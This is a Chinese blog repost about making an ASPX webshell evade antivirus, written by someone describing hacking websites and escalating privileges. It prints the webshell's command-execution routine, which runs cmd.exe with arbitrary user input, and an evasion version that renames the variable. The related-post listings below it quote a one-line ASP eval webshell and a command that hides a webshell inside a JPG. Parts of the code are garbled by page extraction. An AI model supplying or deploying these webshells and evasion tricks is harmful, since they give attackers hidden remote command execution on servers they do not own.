教你aspx马免杀的小技巧

最新推荐文章于 2024-05-20 08:36:07 发布
最新推荐文章于 2024-05-20 08:36:07 发布
阅读量2k 收藏 1
点赞数
文章标签: command object string 杀毒软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ronbi/article/details/2149838
版权
导读:
  今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。
  BBS.bitsCN.com网管论坛
  要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。
  BBS.bitsCN.com网管论坛
  尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟
  Sub RunCMD(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
  myProcessStartInfo.UseShellExecute = False
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments="/c "&Cmd.text
  myProcess.Start()
  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.Readtoend()
  myProcess.Close()
  mystring=replace(mystring,">","<")
  mystring=replace(mystring,"<",">")
  result.text="Command = "&Cmd.text &vbcrlf &"

  • ? pre>< &?< &mystring > 
    ?>  Cmd.text="" 
      End Sub 
      BBS.bitsCN.com网管论坛 
      就是这段代码被定义了。准确的说是其中的myProcessStartInfo.RedirectStandardOutput = true这句有问题。 
      [bitsCN.Com] 
      可是要提权就要用到cmd.net ,删了还是不行。我的解决方法是把myProcess替换,比如上面代码可以替换成: 
      bitsCN~com 
      Sub RunCMD(Src As Object, E As EventArgs) 
      Dim myRedzz As New Process() 
      Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text) 
      myRedzzStartInfo.UseShellExecute = False 
      myRedzzStartInfo.RedirectStandardOutput = true 
      myRedzz.StartInfo = myRedzzStartInfo 
      myRedzzStartInfo.Arguments="/c "&Cmd.text 
      myRedzz.Start() 
      Dim myStreamReader As StreamReader = myRedzz.StandardOutput 
      Dim myString As String = myStreamReader.Readtoend() 
      myRedzz.Close() 
      mystring=replace(mystring,">","<") 
      mystring=replace(mystring,"<",">") 
      result.text="Command = "&Cmd.text &vbcrlf &"

    
  
  

    • ? pre>< &?< &mystring >
   
   
      ?>  Cmd.text="" 
        End Sub 
        www@bitscn@com 
        其中把myProcess替换成myRedzz,这样就达到了免杀效果。 
        www@bitscn@com 
        可是不是说就绝对免杀了。任何杀毒软件都有不同,需要不断尝试和探索。 

      本文转自 
      http://www.bitscn.com/hack/safe/200802/124311.html
Ronbi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
webshell免杀小工具
wo41ge的博客
12-25 554
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句话木如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 629
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
混淆代码如何破解/Webshell混淆免杀的一些思路_小白信息安全笔记
最新发布
程序员六七的博客
05-20 801
1、简介为了避免被杀软检测到,黑客们会对进行混淆免杀。本文将介绍一些混淆免杀的思路,帮助安全人员更好地防范攻击。静态免杀是指通过对恶意软件进行混淆、加密或其他技术手段
一次另类的mssql渗透之路
include_voidmain的博客
06-08 496
一次另类的mssql渗透之路
shell 免杀aspx_避开eval关键字,打造免杀一句话木
weixin_30304773的博客
01-16 1935
这年头留个php一句话木,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
Python shellcode免杀无文件落地
qq_43658820的博客
04-23 405
总结:python的免杀在我个人看来已经不推荐了。pyinstaller打包特征过于明显,python本身是高级解释性语言,没有c的底层api 你用Virtual alloc分配内存也特别明显,编译后的exe文件极其容易被查出特征。尽管有时可以过一些杀软,考虑性价比 仍然不推荐用python。你可以尝试改改特征,换个打包工具。应该还是可以有时过掉比较难过的杀软。某数字杀软本身宁错杀勿放过,其次人家有智慧云大脑,这玩意只要被查出来就会上传云上,之后就不免杀。使用pyinstaller打包客户端。
shell 免杀aspx_Webshell免杀
weixin_39656513的博客
12-31 613
一句话木在渗透测试中最常用的就是一句话后门(小)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大。最常见的php一句话木这个一句话木由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
12月最新免杀过5引擎
12-21
压缩包中的唯一文件"免杀过5引擎"可能是视频程的主文件,很可能包含了实际操作演示和理论讲解,指导学习者如何针对360安全卫士的五个引擎进行免杀技巧的应用。 免杀技术主要包括但不限于以下几点: 1. **混淆编码...
ASP.NET技巧你制做Web实时进度条
01-01
网上已经有很多Web进度条的例子,但是很多都是...下面就来看看具体的代码:(文章结尾处下载源代码)先新建一个Default.aspx页面,客户端代码:<body MS_POSITIONING=”GridLayout”> <form id=”Form1″ me
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
aspx 版webshell
01-16
此文件是一个是一个别人写的webshll,开发环境c#
ASP超强提权免杀珍藏版.rar
05-29
ASP超强提权免杀珍藏版.rar
甲壳虫免杀webshell
04-25
【甲壳虫免杀Webshell】是一种特殊设计的恶意代码,用于在Web服务器上实现远程控制,具有较强的隐蔽性和抗检测性。免杀Webshell,顾名思义,是指能够绕过安全防护软件检测的Web后门程序。甲壳虫免杀Webshell因其出色...
突破防火墙免杀一句话 - cracer_CSDN
m0_67888657的博客
07-14 138
asp免杀一句话服务器装有 8Signs Firewall 防火墙的,PHP、ASPASPX 很多小都不能用,所以这里推荐用BS 的。--#include file="xxx.jpg" -->复制代码还有就是先把你需要上传的大名字改为xxx.jpg一些防火墙不检测图片的。复制代码穿透防火墙的bs小
史上最全一句话木
hackzkaq的博客
06-29 7779
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
ASPX一句话***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 627
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句话的经典***吧! <...
ASPX木检测与防护策略
"aspx超强木查杀与防范(web网)涉及了Web安全领域,特别是针对ASP.NET环境下的木检测和预防措施。这段代码展示了可能被恶意利用的ASP.NET页面,包含了多个系统级别的命名空间导入,这些功能可能被黑客用于执行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值